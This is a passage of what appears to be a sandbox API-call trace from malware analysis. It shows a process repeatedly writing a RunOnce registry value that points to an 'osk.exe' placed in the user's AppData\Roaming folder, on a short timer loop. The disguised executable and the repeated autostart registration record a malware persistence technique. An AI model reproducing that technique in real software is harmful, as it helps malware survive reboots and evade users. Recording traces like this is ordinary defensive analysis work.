hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.708] RegCloseKey (hKey=0x280) returned 0x0 [0108.708] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.708] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.708] SetTimer (hWnd=0x20280, nIDEvent=0x2437, uElapse=0xa, lpTimerFunc=0x0) returned 0x2437 [0108.708] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.723] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.723] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.723] KillTimer (hWnd=0x20280, uIDEvent=0x2437) returned 1 [0108.723] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.724] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.724] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.724] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.724] RegCloseKey (hKey=0x280) returned 0x0 [0108.724] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.725] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.725] SetTimer (hWnd=0x20280, nIDEvent=0x2438, uElapse=0xa, lpTimerFunc=0x0) returned 0x2438 [0108.725] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.741] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.741] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.741] KillTimer (hWnd=0x20280, uIDEvent=0x2438) returned 1 [0108.742] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.742] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.742] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.742] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.743] RegCloseKey (hKey=0x280) returned 0x0 [0108.743] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.743] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.743] SetTimer (hWnd=0x20280, nIDEvent=0x2439, uElapse=0xa, lpTimerFunc=0x0) returned 0x2439 [0108.743] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.754] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.754] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.754] KillTimer (hWnd=0x20280, uIDEvent=0x2439) returned 1 [0108.754] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.755] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.755] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.755] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.755] RegCloseKey (hKey=0x280) returned 0x0 [0108.755] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.755] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.755] SetTimer (hWnd=0x20280, nIDEvent=0x243a, uElapse=0xa, lpTimerFunc=0x0) returned 0x243a [0108.755] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.769] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.769] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.769] KillTimer (hWnd=0x20280, uIDEvent=0x243a) returned 1 [0108.770] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.770] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.770] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.771] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.771] RegCloseKey (hKey=0x280) returned 0x0 [0108.771] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.771] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.771] SetTimer (hWnd=0x20280, nIDEvent=0x243b, uElapse=0xa, lpTimerFunc=0x0) returned 0x243b [0108.771] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.785] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.785] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.785] KillTimer (hWnd=0x20280, 
uIDEvent=0x243b) returned 1 [0108.786] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.786] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.786] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.787] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.787] RegCloseKey (hKey=0x280) returned 0x0 [0108.787] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.787] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.787] SetTimer (hWnd=0x20280, nIDEvent=0x243c, uElapse=0xa, lpTimerFunc=0x0) returned 0x243c [0108.787] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.800] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.800] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.801] KillTimer (hWnd=0x20280, uIDEvent=0x243c) returned 1 [0108.801] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.802] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.802] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.802] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.802] RegCloseKey (hKey=0x280) returned 0x0 [0108.802] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.802] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.802] SetTimer (hWnd=0x20280, nIDEvent=0x243d, uElapse=0xa, lpTimerFunc=0x0) returned 0x243d [0108.803] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.816] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.816] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.816] KillTimer (hWnd=0x20280, uIDEvent=0x243d) returned 1 [0108.817] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.817] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.817] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.817] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.818] RegCloseKey (hKey=0x280) returned 0x0 [0108.818] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.818] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.818] SetTimer (hWnd=0x20280, nIDEvent=0x243e, uElapse=0xa, lpTimerFunc=0x0) returned 0x243e [0108.818] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.832] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.832] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.832] KillTimer (hWnd=0x20280, uIDEvent=0x243e) returned 1 [0108.833] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0108.833] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.833] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.834] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.834] RegCloseKey (hKey=0x280) returned 0x0 [0108.834] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.834] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.834] SetTimer (hWnd=0x20280, nIDEvent=0x243f, uElapse=0xa, lpTimerFunc=0x0) returned 0x243f [0108.834] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.847] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.847] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.847] KillTimer (hWnd=0x20280, uIDEvent=0x243f) returned 1 [0108.848] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.848] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.848] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.849] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.849] RegCloseKey (hKey=0x280) returned 0x0 
[0108.849] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.849] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.849] SetTimer (hWnd=0x20280, nIDEvent=0x2440, uElapse=0xa, lpTimerFunc=0x0) returned 0x2440 [0108.849] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.863] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.863] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.863] KillTimer (hWnd=0x20280, uIDEvent=0x2440) returned 1 [0108.863] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.863] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.864] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.864] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.864] RegCloseKey (hKey=0x280) returned 0x0 [0108.864] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.864] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.864] SetTimer (hWnd=0x20280, nIDEvent=0x2441, uElapse=0xa, lpTimerFunc=0x0) returned 0x2441 [0108.864] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.878] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.878] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.878] KillTimer (hWnd=0x20280, uIDEvent=0x2441) returned 1 [0108.879] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.879] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.879] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.879] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.879] RegCloseKey (hKey=0x280) returned 0x0 [0108.880] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.880] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.880] SetTimer (hWnd=0x20280, nIDEvent=0x2442, uElapse=0xa, lpTimerFunc=0x0) returned 0x2442 [0108.880] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.894] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.894] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.894] KillTimer (hWnd=0x20280, uIDEvent=0x2442) returned 1 [0108.894] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.895] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.895] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.895] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.895] RegCloseKey (hKey=0x280) returned 0x0 [0108.895] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.895] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.895] SetTimer (hWnd=0x20280, nIDEvent=0x2443, uElapse=0xa, lpTimerFunc=0x0) returned 0x2443 [0108.896] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.910] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.910] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.910] KillTimer (hWnd=0x20280, uIDEvent=0x2443) returned 1 [0108.910] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.911] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.911] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.911] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.911] RegCloseKey (hKey=0x280) returned 0x0 [0108.912] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.912] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.912] SetTimer (hWnd=0x20280, nIDEvent=0x2444, uElapse=0xa, lpTimerFunc=0x0) returned 0x2444 [0108.912] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.925] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.925] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.925] KillTimer (hWnd=0x20280, uIDEvent=0x2444) returned 1 [0108.926] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.926] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.926] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.927] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.927] RegCloseKey (hKey=0x280) returned 0x0 [0108.927] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.927] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.927] SetTimer (hWnd=0x20280, nIDEvent=0x2445, uElapse=0xa, lpTimerFunc=0x0) returned 0x2445 [0108.927] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.941] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.941] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.941] KillTimer (hWnd=0x20280, uIDEvent=0x2445) returned 1 [0108.941] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.941] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.941] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.942] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.942] RegCloseKey (hKey=0x280) returned 0x0 [0108.942] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.942] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0108.942] SetTimer (hWnd=0x20280, nIDEvent=0x2446, uElapse=0xa, lpTimerFunc=0x0) returned 0x2446 [0108.942] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.956] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.956] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.956] KillTimer (hWnd=0x20280, uIDEvent=0x2446) returned 1 [0108.957] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.957] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.957] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.957] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.957] RegCloseKey (hKey=0x280) returned 0x0 [0108.958] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.958] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.958] SetTimer (hWnd=0x20280, nIDEvent=0x2447, uElapse=0xa, lpTimerFunc=0x0) returned 0x2447 [0108.958] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.972] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.972] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.972] KillTimer (hWnd=0x20280, uIDEvent=0x2447) returned 1 [0108.972] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.973] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.973] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.973] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.973] RegCloseKey (hKey=0x280) returned 0x0 [0108.973] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.973] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.973] SetTimer (hWnd=0x20280, nIDEvent=0x2448, uElapse=0xa, lpTimerFunc=0x0) returned 0x2448 [0108.973] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.988] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.988] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.988] KillTimer (hWnd=0x20280, uIDEvent=0x2448) returned 1 [0108.988] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.989] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.989] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.989] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.989] RegCloseKey (hKey=0x280) returned 0x0 [0108.989] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.989] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.990] SetTimer (hWnd=0x20280, nIDEvent=0x2449, uElapse=0xa, lpTimerFunc=0x0) returned 0x2449 
